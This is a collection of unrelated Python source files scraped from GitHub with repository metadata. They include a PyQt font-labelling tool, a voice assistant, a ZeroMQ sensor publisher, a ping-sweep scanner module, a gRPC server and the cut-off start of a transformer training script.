Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\")\n\n# look at some of the predictions\nfor idx in range(9):\n # define subplot\n pyplot.subplot(330 + 1 + idx)\n # plot raw pixel data, get random value\n i = random.randint(0, len(test_data)-1)\n pyplot.imshow(test_data[i][0][0], cmap=pyplot.get_cmap('gray'))\n # prediction\n x, y = test_data[i][0], test_data[i][1]\n with torch.no_grad():\n x = x.to(device)\n pred = model(x)\n predicted, actual = classes[pred[0].argmax(0)], classes[y]\n print(f'Predicted: \"{predicted}\", Actual: \"{actual}\"')\n pyplot.title(f'Predicted: \"{predicted}\", Actual: \"{actual}\"')\n\n# show the figure\npyplot.show()","repo_name":"dweinshenker/airflow_ml_pipeline_tutorial","sub_path":"dags/ml_pipeline/v1/ml_pipeline.py","file_name":"ml_pipeline.py","file_ext":"py","file_size_in_byte":5547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13836531832","text":"from 
PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QGridLayout, QListWidget, QLabel, QSlider, QPushButton\nfrom PyQt5.QtGui import QPixmap, QKeySequence\nfrom PyQt5.QtCore import Qt\n\nfrom PIL import ImageFont, ImageDraw, Image, ImageQt\nfrom glob import glob\nimport os\nimport yaml\nfrom functools import partial\nimport copy\nimport sys\n\nclass Labeltool(QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.label_file = '00_labels.yaml'\n self.font_types = ['*.otf', '*.ttf']\n self.font_dir = 'C:/Users/Schnee/Datasets/Fonts01CleanUp/'\n\n self.fonts = []\n for type in self.font_types:\n self.fonts.extend(glob(self.font_dir + type))\n\n self.current_row = 0\n self.current_font = os.path.basename(self.fonts[self.current_row])\n\n self.slider_steps = 20\n\n self.label_names = ['Weight', 'Width', 'Contrast', 'Serifs', 'Italic', 'Roundness']\n self.labels = dict()\n\n self.label_cache = [0.0] * len(self.label_names)\n\n if not os.path.exists(self.font_dir + self.label_file):\n for font in self.fonts:\n filename = os.path.basename(font)\n self.labels[filename] = [0.0] * len(self.label_names)\n\n with open(self.font_dir + self.label_file, 'w') as f:\n yaml.dump(self.labels, f)\n\n else:\n with open(self.font_dir + self.label_file) as f:\n self.labels = yaml.load(f, Loader=yaml.FullLoader)\n\n self.init_UI()\n\n def init_UI(self):\n self.layout = QHBoxLayout()\n\n self.layout_left = QVBoxLayout()\n self.layout_right = QVBoxLayout()\n\n self.layout.addLayout(self.layout_left)\n self.layout.addLayout(self.layout_right)\n\n self.font_list = QListWidget()\n self.caption = QLabel()\n self.font_view = QLabel()\n\n self.btn_prev = QPushButton('Prev (Left Arrow Key)')\n self.btn_next = QPushButton('Next (Right Arrow Key)')\n self.btn_copy = QPushButton('Copy Labels (Ctrl+C)')\n self.btn_paste = QPushButton('Paste Labels (Ctrl+V)')\n self.btn_save = QPushButton('Save (Ctrl+S)')\n\n self.slider_captions = [QLabel() for _ in range(len(self.label_names))]\n self.sliders = [QSlider(Qt.Horizontal) for _ in range(len(self.label_names))]\n\n self.layout_left.addWidget(self.font_list)\n\n self.layout_right.addWidget(self.caption)\n self.layout_right.addWidget(self.font_view)\n\n self.layout_sliders = QGridLayout()\n\n for i in range(len(self.label_names)):\n self.slider_captions[i].setText(self.label_names[i])\n self.sliders[i].setTickPosition(QSlider.TicksBelow)\n self.sliders[i].setTickInterval(2)\n self.layout_sliders.addWidget(self.slider_captions[i], i, 0)\n self.layout_sliders.addWidget(self.sliders[i], i, 1)\n\n self.layout_right.addLayout(self.layout_sliders)\n\n layout_btns = QHBoxLayout()\n\n layout_btns.addWidget(self.btn_prev)\n layout_btns.addWidget(self.btn_next)\n layout_btns.addWidget(self.btn_copy)\n layout_btns.addWidget(self.btn_paste)\n layout_btns.addWidget(self.btn_save)\n\n self.layout_right.addLayout(layout_btns)\n\n for font in self.fonts:\n filename = os.path.basename(font)\n self.font_list.addItem(filename)\n\n self.font_list.itemActivated.connect(self.select_font)\n\n self.btn_next.clicked.connect(self.next_font)\n self.btn_prev.clicked.connect(self.prev_font)\n self.btn_copy.clicked.connect(self.copy_label)\n self.btn_paste.clicked.connect(self.paste_label)\n self.btn_save.clicked.connect(self.save_labels)\n\n self.btn_next.setShortcut(QKeySequence('Right'))\n self.btn_prev.setShortcut(QKeySequence('Left'))\n self.btn_copy.setShortcut(QKeySequence('Ctrl+C'))\n self.btn_paste.setShortcut(QKeySequence('Ctrl+V'))\n 
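The slider wiring in this `labeltool.py` record connects every `valueChanged` signal through `functools.partial`, so a single handler serves all sliders while PyQt appends the new slider value as the trailing argument. A standalone illustration of that pattern (names here are illustrative; the record's handler reads the value back from the slider instead of taking it as a parameter):

```python
from functools import partial

SLIDER_STEPS = 20  # matches self.slider_steps in the record

def slider_changed(index, value):
    # map the integer tick position back to a float label in [-1.0, 1.0]
    print(f"slider {index} -> {value / SLIDER_STEPS:+.2f}")

handler = partial(slider_changed, 3)  # what .connect(partial(...)) receives
handler(10)                           # Qt supplies the value: prints +0.50
```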
self.btn_save.setShortcut(QKeySequence('Ctrl+S'))\n\n for i in range(len(self.sliders)):\n self.sliders[i].setMinimum(-self.slider_steps)\n self.sliders[i].setMaximum(self.slider_steps)\n self.sliders[i].valueChanged.connect(partial(self.slider_changed, i))\n\n self.select_font(self.font_list.item(self.current_row))\n\n self.setWindowTitle('Labeltool')\n self.setLayout(self.layout)\n self.show()\n\n def next_font(self):\n self.current_row = (self.current_row + 1) % (len(self.fonts))\n font = self.font_list.item(self.current_row)\n self.set_sample_text(self.font_dir + font.text())\n\n def prev_font(self):\n self.current_row = (self.current_row - 1) % (len(self.fonts))\n font = self.font_list.item(self.current_row)\n self.set_sample_text(self.font_dir + font.text())\n\n def select_font(self, font):\n self.current_row = self.font_list.currentRow()\n self.set_sample_text(self.font_dir + font.text())\n\n def set_sample_text(self, font, sample_text=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\\nabcdefghijklmnopqrstuvwxyz .,-!?/\", im_size=(1200,200), txt_size=55):\n self.current_font = os.path.basename(font)\n self.update_caption()\n font = ImageFont.truetype(font, txt_size)\n im = Image.new('L', (im_size[0], im_size[1]), 0)\n draw = ImageDraw.Draw(im)\n _, h = draw.textsize(sample_text, font=font)\n draw.text((20, im_size[1]/2-h/2), sample_text, font=font, fill='#FFF')\n\n q_img = ImageQt.ImageQt(im)\n q_pix = QPixmap.fromImage(q_img)\n self.font_view.setPixmap(q_pix)\n\n for i, slider in enumerate(self.sliders):\n slider.setValue(self.labels[self.current_font][i] * self.slider_steps)\n\n def slider_changed(self, i):\n self.labels[self.current_font][i] = self.sliders[i].value() / self.slider_steps\n self.update_caption()\n\n def update_caption(self):\n self.caption.setText(f'Font {self.current_row+1} of {len(self.fonts)}. Current font: {self.current_font}. 
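`set_sample_text()` above measures the multiline preview string with `draw.textsize()`, an API Pillow has deprecated and newer releases removed in favour of the bbox calls (version details hedged from memory). A sketch of the same centring computation with `multiline_textbbox()`, using the default font so it runs without the record's font directory:

```python
from PIL import Image, ImageDraw, ImageFont

im = Image.new('L', (1200, 200), 0)
draw = ImageDraw.Draw(im)
font = ImageFont.load_default()
text = "ABCDEFG\nabcdefg .,-!?/"

# bbox is (left, top, right, bottom); its height replaces textsize()[1]
left, top, right, bottom = draw.multiline_textbbox((0, 0), text, font=font)
h = bottom - top
draw.multiline_text((20, 200 / 2 - h / 2), text, font=font, fill=255)
```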
Labels: {self.labels[self.current_font]}')\n\n def save_labels(self):\n with open(self.font_dir + self.label_file, 'w') as f:\n yaml.dump(self.labels, f)\n\n def copy_label(self):\n self.label_cache = copy.copy(self.labels[self.current_font])\n\n def paste_label(self):\n self.labels[self.current_font] = copy.copy(self.label_cache)\n\n for i, slider in enumerate(self.sliders):\n slider.setValue(self.labels[self.current_font][i] * self.slider_steps)\n\ndef main():\n app = QApplication([])\n labeltool = Labeltool()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n main()","repo_name":"sanic-the-hedgefond/conditional-PGAN","sub_path":"labeltool/labeltool.py","file_name":"labeltool.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12025559191","text":"import datetime\nimport pywhatkit\nimport wikipedia\nimport webbrowser\nfrom weather import *\nfrom speak import *\nfrom send_email import *\nfrom notepad import *\n\n\n\ndef run_chad():\n command = take_command()\n if 'play' in command:\n song = command.replace('play', '')\n speak('Now playing ' + song)\n pywhatkit.playonyt(song)\n elif 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n print(time)\n speak('The time is now ' + time)\n elif 'date' in command:\n date = datetime.datetime.now().strftime('%A,%d %B, %Y')\n print(date)\n speak(\"Today's date is \" + date)\n elif 'wikipedia' in command:\n person = command.replace('wikipedia', '')\n info = wikipedia.summary(person, 1)\n print(info)\n speak(info)\n elif 'google' in command:\n thing = command.replace('google', '')\n webbrowser.open(f'https://www.google.com/search?q={thing}')\n speak('Here are the results of your google search ')\n elif 'weather in' in command:\n city = command.split(\"in\", 1)\n weather_data = weather_api(city[1])\n speak(weather_data)\n elif 'send email' in command:\n mail_info()\n elif 'goodbye' in command:\n speak(\"bye bye\")\n quit()\n elif 'create a note' in command:\n note()\n\n else:\n speak(\"Say that again.\")\n\n\nwhile True:\n run_chad()\n\n\n","repo_name":"Sarinafo/Desktop-Assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8918827156","text":"import platform\nimport struct\nimport sys\n\nfrom ctypes import cdll, c_char_p, CFUNCTYPE\nfrom fnmatch import fnmatch\n\nplat_table = (\n ('windows', ('windows', 'cygwin-*')),\n ('darwin', ('darwin',)),\n ('ios', ('ios',)),\n ('linux', ('linux*',)),\n ('freebsd', ('freebsd*', 'openbsd*', 'isilon onefs')),\n ('poky', ('poky',)),\n)\n\narch_table = (\n ('x86', ('i?86', )),\n ('x86_64', ('x64', 'x86_64', 'amd64', 'intel')),\n ('arm', ('armv5',)),\n ('armv6', ('armv6l',)),\n ('armv7', ('armv7l',)),\n ('ppc64', ('ppc64le',)),\n ('mips32', ('mips',)),\n ('aarch32', ('aarch32',)),\n ('aarch64', ('aarch64', 'arm64'))\n)\n\n\ndef _match_features(patterns, s):\n for pat in patterns:\n if fnmatch(s, pat):\n return True\n\n\ndef _gnu_get_libc_version():\n try:\n prototype = CFUNCTYPE(c_char_p)\n ver = prototype(('gnu_get_libc_version', cdll.LoadLibrary('')))()\n return ver.decode().split('.')\n except Exception:\n pass\n\n\ndef format_platform():\n plat = platform.system().lower()\n mach = platform.machine().lower()\n\n for alias, platlist in plat_table:\n if _match_features(platlist, plat):\n plat = alias\n break\n\n if plat == 'linux':\n cname, 
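The `run_chad()` routine in the Desktop-Assistant record above grows one `elif` per voice command; the same keyword dispatch can be table-driven, sketched here with two hypothetical handlers (names are not from the original script):

```python
import datetime

def handle_time(_cmd):
    return datetime.datetime.now().strftime('%I:%M %p')

def handle_date(_cmd):
    return datetime.datetime.now().strftime('%A, %d %B %Y')

HANDLERS = [('time', handle_time), ('date', handle_date)]

def dispatch(command):
    # first keyword found wins, mirroring the original elif order
    for keyword, handler in HANDLERS:
        if keyword in command:
            return handler(command)
    return "Say that again."

print(dispatch('what time is it'))
```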
cver = platform.libc_ver()\n if cname == 'musl':\n plat = 'musl'\n elif cname == 'libc':\n plat = 'android'\n elif cname == 'glibc':\n v = _gnu_get_libc_version()\n if v and len(v) >= 2 and (int(v[0]) * 100 + int(v[1])) < 214:\n plat = 'centos6'\n\n for alias, archlist in arch_table:\n if _match_features(archlist, mach):\n mach = alias\n break\n\n if plat == 'windows' and mach == 'x86_64':\n bitness = struct.calcsize('P'.encode()) * 8\n if bitness == 32:\n mach = 'x86'\n\n return '.'.join([plat, mach])\n\n\nif __name__ == '__main__':\n print('platform.system is \"%s\"' % platform.system())\n print('platform.machine is \"%s\"' % platform.machine())\n print('sys.byteorder is \"%s\"' % sys.byteorder)\n print('The standard platform name is \"%s\"' % format_platform())\n","repo_name":"dashingsoft/pyarmor","sub_path":"src/helper/get_platform_name.py","file_name":"get_platform_name.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":2600,"dataset":"github-code","pt":"18"} +{"seq_id":"33971356768","text":"\"\"\"\nPublishes temperature, pressure, humidity, luminosity and heat index from your Pi over 0MQ.\n\"\"\"\nimport logging\n\nimport argparse\nimport sys\nfrom json import dumps\nfrom time import sleep\n\nfrom socket import gethostname\n\nfrom AnaviInfraredPhat import report_tphl_average\nfrom pap_logger import PaPLogger, DEBUG, INFO\nimport zmq\n\n\ndef _run(param):\n \"\"\"\n Publishes temperature, pressure, humidity, luminosity and heat index from your Pi over 0MQ every interval seconds.\n \"\"\"\n logging.info('Starting')\n context = zmq.Context()\n socket = context.socket(zmq.PUB)\n socket.setsockopt(zmq.CONFLATE, 1)\n socket.bind(\"tcp://%s:%s\" % (\"*\", param.pub_port))\n hostname = gethostname()\n while True:\n data = dumps(report_tphl_average(\"localhost\"))\n logging.debug(data)\n socket.send_string(\"{} {}\".format(hostname, data))\n sleep(param.interval)\n\n\ndef _main():\n param = _get_args()\n level = DEBUG if param.verbose else INFO\n pap = PaPLogger(level=level, verbose_fmt=True)\n pap.log_file = \"/var/logAnaviInfraredPhat.log\"\n _run(param)\n\n\ndef _get_args():\n parser = argparse.ArgumentParser(\n description='Publishes temperature, pressure, humidity, luminosity and heat index from your Pi over 0MQ.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--pub_port\", help=\"port for zmq publication\", default=4242, type=int)\n parser.add_argument(\"--interval\", help=\"publication interval in seconds\", default=30, type=int)\n parser.add_argument(\"--verbose\", help=\"activate debugging\", action=\"store_true\")\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n try:\n _main()\n except KeyboardInterrupt:\n logging.info(\"Exiting\")\n sys.exit(0)\n except Exception:\n logging.exception(\"exception raised\")\n sys.exit(-1)\n","repo_name":"1743294154/python-xiao","sub_path":"venv/Lib/site-packages/AnaviInfraredPhat/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"28431699718","text":"import os.path\nimport re\nimport subprocess\nimport traceback\nfrom time import sleep\nfrom utils.output import Output\nfrom utils.db import DB\n\nttl_pattern = re.compile(\"^\\\\d+.+: icmp_seq=\\\\d+ ttl=(\\\\d+) \\\\S+=\\\\S+\\\\s+ms.*$\")\nrtt_pattern = 
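A hedged sketch of a subscriber matching the 0MQ publisher in the `AnaviInfraredPhat` record above, assuming the default port 4242 and the `"<hostname> <json>"` framing it sends; setting `CONFLATE` on the SUB side mirrors the publisher, so only the newest sample is kept:

```python
import zmq

context = zmq.Context()
sock = context.socket(zmq.SUB)
sock.setsockopt(zmq.CONFLATE, 1)           # keep only the latest message
sock.setsockopt_string(zmq.SUBSCRIBE, "")  # no topic filter
sock.connect("tcp://localhost:4242")       # options must precede connect

for _ in range(3):                         # read a few samples, then stop
    hostname, payload = sock.recv_string().split(" ", 1)
    print(hostname, payload)
```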
re.compile(\"^rtt\\\\s+min/avg/max/mdev\\\\s+=\\\\s+(\\\\d+\\\\.\\\\d+)/(\\\\d+\\\\.\\\\d+)/(\\\\d+\\\\.\\\\d+)/(\\\\d+\\\\.\\\\d+)\\\\s+ms.*$\")\n\ndef pingscan_worker(target, timeout):\n try:\n pingscan = PingScan(target['hostname'], timeout)\n\n is_up, rtt, os = pingscan.check_up()\n\n if is_up:\n Output.write({'target': '%s' % target['hostname'], 'message': \"Up => %.4f ms (%s)\" % (rtt, os)})\n\n DB.insert_ip({\n 'hostname': target['hostname'],\n 'rtt': rtt,\n })\n except Exception as e:\n raise e\n\nclass PingScan:\n\n def __init__(self, hostname, timeout):\n self.hostname = hostname\n self.timeout = timeout\n\n def check_up(self):\n\n process = subprocess.Popen(\"ping -c 3 -i 0.2 %s -w %d\" % (self.hostname, self.timeout), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n process_output, _ = process.communicate()\n process.wait()\n process_returncode = process.returncode\n\n if process_returncode == 2:\n process = subprocess.Popen(\"ping -c 3 -i 0,2 %s -w %d\" % (self.hostname, self.timeout), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n process_output, _ = process.communicate()\n process.wait()\n process_returncode = process.returncode\n\n if process_returncode == 0:\n rtt = None\n os = 'Unknown'\n\n for line in process_output.decode().split('\\n'):\n m = ttl_pattern.match(line)\n if m:\n if int(m.group(1)) == 64:\n os = 'Linux?'\n elif int(m.group(1)) == 128:\n os = 'Windows?'\n elif int(m.group(1)) == 255:\n os = 'AIX/FreeBSD?'\n else:\n os = 'Unknown (ttl=%s)' % m.group(1)\n\n m = rtt_pattern.match(line)\n if m:\n rtt = float(m.group(2))\n break\n\n return True, rtt, os\n elif process_returncode == 1:\n pass\n else:\n Output.error({'target': '%s' % self.hostname, 'message': \"Error: ping return code: %d\" % (process_returncode,)})\n\n return False, None, None\n","repo_name":"hegusung/netscan","sub_path":"scripts/lib/pingscan/pingscan.py","file_name":"pingscan.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"} +{"seq_id":"33829195481","text":"import numpy as np\r\nimport pickle\r\nimport pandas as pd\r\nimport cv2\r\nfrom reading_feats import *\r\nfrom set_weights_for_model import *\r\nfrom preprocesing_feats import *\r\nfrom preprocessing_pics import *\r\nfrom model_7_feats import *\r\n\r\nbase_path = 'D:/Users/Keren/Documents/university/Year 2/DNA Fragmentation/Acridine Orange/feature_extractions/'\r\n\r\nall_dfs,donors = read_feats_file(base_path+'final_exp_3.xlsx')\r\n\r\ncombined_model = set_weights('New_AO_combined_7feats_2best_prec.pickle',combined_model)\r\n\r\nimage_location_base_dir = 'E:/Keren Sperm Project Backup/final_exp'\r\n\r\nall_ao_outputs = {}\r\n\r\nfor i in range(len(all_dfs)):\r\n all_images = []\r\n all_feats = []\r\n cur_indexes = list(all_dfs[i].iloc[:,0])\r\n for j in range(len(cur_indexes)):\r\n cur_index = cur_indexes[j]\r\n v_ind = cur_index.index('v')\r\n f_ind = cur_index.index('f')\r\n C_ind = cur_index.index('C')\r\n\r\n don_num = (cur_index[1:v_ind])\r\n vid_num = (cur_index[v_ind + 1:f_ind])\r\n frm_num = (cur_index[f_ind + 1:C_ind])\r\n cel_num = (cur_index[C_ind + 2:])\r\n\r\n cur_location = image_location_base_dir + '/donor ' + don_num + '/video_' + vid_num + '/C_' + cel_num + '/' + frm_num + '.png'\r\n all_images.append(resize(cv2.imread(cur_location)))\r\n all_feats.append(np.array(all_dfs[i].iloc[j, 1:]))\r\n\r\n all_images = np.array(all_images)\r\n all_images = all_images[:,:,:,0]\r\n all_images = 
all_images[:,:,:,np.newaxis]\r\n all_feats = np.array(all_feats)\r\n all_feats = normalizing_features(all_feats)\r\n cur_AO_output = combined_model.predict([all_images, all_feats],batch_size=32,verbose=1)\r\n\r\n cur_df = all_dfs[i]\r\n cur_df['AO'] = cur_AO_output\r\n all_ao_outputs[donors[i]]=np.nanmean(cur_AO_output)\r\n\r\n\r\n# with pd.ExcelWriter(base_path+'final_exp_wao.xlsx') as writer:\r\n# columns = ['Total Head Area','Nucleus Area','Acrosome Area','Mean Post Ant Diff','Mean OPD','Var OPD','Drymass','AO']\r\n# for i in range(len(all_dfs)):\r\n# df = all_dfs[i]\r\n# sheet_name = 'donor '+str(donors[i])\r\n# df.to_excel(writer, sheet_name=sheet_name)\r\n","repo_name":"kbenyehuda/AO-Fragmentation-Base-Model","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36433252672","text":"import asyncio\nimport grpc\nfrom service_pb2 import Response\nfrom service_pb2_grpc import YourServiceServicer, add_YourServiceServicer_to_server\n\n\nclass YourServicer(YourServiceServicer):\n async def UnaryCall(self, request, context):\n return Response(message=f\"Hello, {request.message}\")\n\n async def StreamCall(self, request, context):\n for i in range(10): # Отправляем 10 сообщений\n await asyncio.sleep(1)\n yield Response(message=f\"Stream {i}\")\n\n\nasync def serve():\n server = grpc.aio.server()\n add_YourServiceServicer_to_server(YourServicer(), server)\n server.add_insecure_port('[::]:50051')\n await server.start()\n await server.wait_for_termination()\n\nif __name__ == '__main__':\n asyncio.run(serve())\n","repo_name":"AlexKenbo/grpc_python_tests","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33782212111","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# Variables:\nb = 8/3\nsig = 10\nplt.style.use('bmh')\n\n#Determine Polynomial coefficients\ndef polyarray(b,sig,r):\n p3 = 1\n p2 = 1 + b + sig\n p1 = b*(sig + r)\n p0 = 2*sig*b*(r - 1)\n return np.array([p3,p2,p1,p0])\n\nplt.axvspan(-15,0, alpha=0.2, color='green', label='stable')\nplt.axvspan(0,5, alpha=0.2, color='red',label='unstable')\nfor r in [1.3456,1.5,20,24.74,28]:\n poly = polyarray(b,sig,r)\n roots = np.roots(poly)\n \n print('\\nSolutions for r = '+str(r)+'\\n')\n print('x1 = '+str(np.round(roots[0],2)))\n print('x2 = '+str(np.round(roots[1],2)))\n print('x3 = '+str(np.round(roots[2],2)))\n\n plt.scatter(roots.real, roots.imag, label='r = {}'.format(r))\nplt.xlim(-15,2)\nplt.legend()\nplt.show()\n \n \n","repo_name":"MauriceDonner/CompPhys","sub_path":"8_Exerc/ex1-2.py","file_name":"ex1-2.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1445606273","text":"from Trieste.common.utils import next\nfrom Trieste.common.object import Object\n\nclass Ring (Object):\n \"\"\"\n This class handles all the calls to navels that can return a redirection\n and handle that redirection\n \"\"\"\n def __init__ (self, master):\n Object.__init__ (self)\n self.master= master\n self.peers= master._peers\n\n def getData (self, key):\n navel= self.peers.getAuthNavel (key)\n ans= navel.getData (key)\n ok= ans[0]\n while not ok:\n (url, key)= ans[1]\n self.debug (1, \"redirect to: %s:%d\" % (url, key))\n navel= self.peers.getNavel (url, key)\n 
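The Lorenz record above finds the roots of the characteristic polynomial and reads stability off their real parts; that check packages naturally as a single predicate. A compact sketch (parameters follow the record's b = 8/3, sigma = 10, where the stability threshold sits near r ≈ 24.74):

```python
import numpy as np

def is_stable(b, sig, r):
    # the fixed point is linearly stable iff every eigenvalue has Re < 0
    poly = [1, 1 + b + sig, b * (sig + r), 2 * sig * b * (r - 1)]
    return bool(np.all(np.roots(poly).real < 0))

print(is_stable(8 / 3, 10, 20))   # True  - below the r ~ 24.74 threshold
print(is_stable(8 / 3, 10, 28))   # False - classic chaotic regime
```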
ans= navel.getData (key)\n ok= ans[0]\n\n # when succeed, returns a str of the list\n return ans\n\n def addData (self, data, max, peer=None):\n # may be this should be more clever,\n # just like what vice does\n if peer==None:\n keys=data.keys ()\n keys.sort ()\n peer= self.peers.getAuthNavel (keys[0])\n\n ans= peer.addData (data)\n # iterate as the keys get rejected 'cause there's another auth\n ok= ans[0]\n while not ok:\n (url, key)= ans[1]\n self.debug (1, \"redirect to: %s:%d\" % (url, key))\n peer= self.peers.getNavel (url, key)\n ans= peer.addData (self.master.giveData (peer.key (), max))\n ok= ans[0]\n\n def delKey (self, key):\n \"\"\"\n removes one key from the ring. used when deleting inodes.\n \"\"\"\n peer= self.peers.getAuthNavel (key)\n ans= peer.delKey (key)\n\n # methods to come:\n # takeData from Navel.keyPass()\n # forgetData from Navel.tellPredToForget()\n\n def vicesForIno (self, ino):\n urls= self.getData (ino)\n ok= next (urls)\n if ok:\n vices= []\n for url in urls:\n vices.append (self.peers.getVice (url))\n self.debug (1, 'ino %d vices: %s' % (ino, vices))\n return vices\n else:\n return None\n","repo_name":"StyXman/Trieste","sub_path":"Trieste/common/ring.py","file_name":"ring.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"8037516002","text":"from tkinter.filedialog import askdirectory\n\nimport os\nimport re\n\n\ndef sanitizeFiles():\n directory = askdirectory()\n\n if directory.split('/')[-1] == 'ST':\n for filename in os.listdir(directory):\n filepath = directory + '/' + filename\n if not os.path.isfile(filepath):\n continue\n\n f = open(filepath, \"r+\", encoding=\"utf8\")\n fullText = f.read()\n fullText = fullText.replace('Active in Program', '\\nActive in Program').replace('Admit Term', '\\nAdmit Term')\n\n f.seek(0) # go to the beginning of the file before writing\n f.write(fullText)\n f.truncate()\n f.close()\n\n elif directory.split('/')[-1] == 'SIN':\n for filename in os.listdir(directory):\n filepath = directory + '/' + filename\n if not os.path.isfile(filepath):\n continue\n\n f = open(filepath, \"r+\", encoding=\"utf8\")\n fullText = f.read()\n\n try:\n firstName = re.findall('First Name:[a-zA-Z]*\\n*', fullText)[0].rstrip('\\n')\n middleName = re.findall('Middel Name\\(s\\):[a-zA-Z]*\\n*', fullText)[0].rstrip('\\n')\n except IndexError as error:\n print(f'Could not parse file {filename} correctly: {error}')\n continue\n\n # the order of string replacement is important\n fullText = fullText.replace('Family Name(s):', '')\n fullText = re.sub('Middel Name\\(s\\):[a-zA-Z]*\\n*', middleName + ' ', fullText).replace('Middel Name(s):', ' ')\n fullText = re.sub('First Name:[a-zA-Z]*\\n*', firstName + ' ', fullText)\n\n f.seek(0) # go to the beginning of the file before writing\n f.write(fullText)\n f.truncate()\n f.close()\n\n\nif __name__ == '__main__':\n sanitizeFiles()\n","repo_name":"AC159/doccano-client","sub_path":"Machine-Learning-Integration/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"9506557279","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport math\nimport time\nimport numpy as np\nfrom transformers.utils import logging\nfrom transformers import glue_convert_examples_to_features, DataCollatorForLanguageModeling\nfrom transformers import 
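The `sanitizeFiles` record above edits each file in place with the `seek(0)` / `write()` / `truncate()` sequence; `truncate()` is the easy step to forget, since a shorter replacement would otherwise leave the tail of the old contents behind. The pattern factored into a helper (a sketch; `transform` is any `str -> str` callable):

```python
def rewrite_in_place(path, transform):
    # read-modify-write on a single handle; truncate() drops any stale tail
    with open(path, "r+", encoding="utf8") as f:
        new_text = transform(f.read())
        f.seek(0)
        f.write(new_text)
        f.truncate()

# e.g. rewrite_in_place("notes.txt", str.upper)
```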
BertTokenizer, BertModel\nfrom transformers.models.bert.modeling_bert import BertEmbeddings\nfrom torch.autograd import variable\nfrom torch.utils.data import DataLoader\nfrom data import load_wiki\nimport wandb\nlogging.set_verbosity_error()\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nfrom hourglass.hourglass_transformer_pytorch.hourglass_transformer_pytorch import HourglassTransformerLM\n\n\nclass CosineWarmupScheduler(optim.lr_scheduler._LRScheduler):\n\n def __init__(self, optimizer, warmup, max_iters):\n self.warmup = warmup\n self.max_num_iters = max_iters\n super().__init__(optimizer)\n\n def get_lr(self):\n lr_factor = self.get_lr_factor(epoch=self.last_epoch)\n return [base_lr * lr_factor for base_lr in self.base_lrs]\n\n def get_lr_factor(self, epoch):\n lr_factor = 0.5 * (1 + np.cos(np.pi * epoch / self.max_num_iters))\n if epoch <= self.warmup:\n lr_factor *= epoch * 1.0 / self.warmup\n return lr_factor\n \n\ndef scaled_dot_product(q, k, v, mask=None):\n d_k = q.size()[-1]\n attn_logits = torch.matmul(q, k.transpose(-2, -1))\n attn_logits = attn_logits / math.sqrt(d_k)\n if mask is not None:\n attn_logits = attn_logits.masked_fill(mask == 0, -9e15) \n attention = F.softmax(attn_logits, dim=-1)\n values = torch.matmul(attention, v)\n return values, attention\n\nclass MultiheadAttention(nn.Module):\n\n def __init__(self, input_dim, embed_dim, num_heads):\n super().__init__()\n assert embed_dim % num_heads == 0, \"Embedding dimension must be 0 modulo number of heads.\"\n\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n self.head_dim = embed_dim // num_heads\n\n # Stack all weight matrices 1...h together for efficiency\n # Note that in many implementations you see \"bias=False\" which is optional\n self.qkv_proj = nn.Linear(input_dim, 3*embed_dim)\n self.o_proj = nn.Linear(embed_dim, embed_dim)\n\n self._reset_parameters()\n\n def _reset_parameters(self):\n # Original Transformer initialization, see PyTorch documentation\n nn.init.xavier_uniform_(self.qkv_proj.weight)\n self.qkv_proj.bias.data.fill_(0)\n nn.init.xavier_uniform_(self.o_proj.weight)\n self.o_proj.bias.data.fill_(0)\n\n def forward(self, x, mask=None, return_attention=False):\n batch_size, seq_length, _ = x.size()\n qkv = self.qkv_proj(x)\n\n # Separate Q, K, V from linear output\n qkv = qkv.reshape(batch_size, seq_length, self.num_heads, 3*self.head_dim)\n qkv = qkv.permute(0, 2, 1, 3) # [Batch, Head, SeqLen, Dims]\n q, k, v = qkv.chunk(3, dim=-1)\n\n # Determine value outputs\n values, attention = scaled_dot_product(q, k, v, mask=mask)\n values = values.permute(0, 2, 1, 3) # [Batch, SeqLen, Head, Dims]\n values = values.reshape(batch_size, seq_length, self.embed_dim)\n o = self.o_proj(values)\n\n if return_attention:\n return o, attention\n else:\n return o\n\nclass EncoderBlock(nn.Module):\n\n def 